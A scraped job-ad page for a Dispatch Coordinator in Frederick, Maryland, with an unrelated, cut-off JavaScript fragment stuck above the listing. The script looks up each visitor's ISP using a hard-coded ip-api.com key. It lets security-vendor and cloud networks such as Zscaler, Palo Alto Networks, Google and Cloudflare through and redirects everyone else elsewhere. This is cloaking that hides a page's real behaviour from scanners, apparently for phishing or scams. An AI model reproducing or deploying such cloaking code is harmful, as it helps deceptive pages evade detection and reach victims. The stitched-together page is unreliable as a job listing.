Dispatch Coordinator
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a dedicated Dispatch Coordinator to join our team in Frederick, Maryland. In this role, you will be responsible for scheduling and coordinating daily transportation activities, ensuring timely and efficient service delivery.
Key responsibilities include:
- Assigning and dispatching drivers and vehicles to meet daily operational needs
- Monitoring vehicle locations and statuses in real-time to optimize routes and respond to issues
- Communicating effectively with drivers, clients, and team members to coordinate schedules and resolve problems
- Maintaining accurate records of dispatch activities, deliveries, and driver logs
- Ensuring compliance with safety and regulatory standards
Skills required:
- Strong organizational and multitasking abilities
- Excellent communication and problem-solving skills
- Ability to work under pressure and adapt to changing priorities
- Proficiency in dispatch or transportation management software
Benefits include competitive compensation, health insurance, paid time off, and opportunities for growth within a dynamic environment.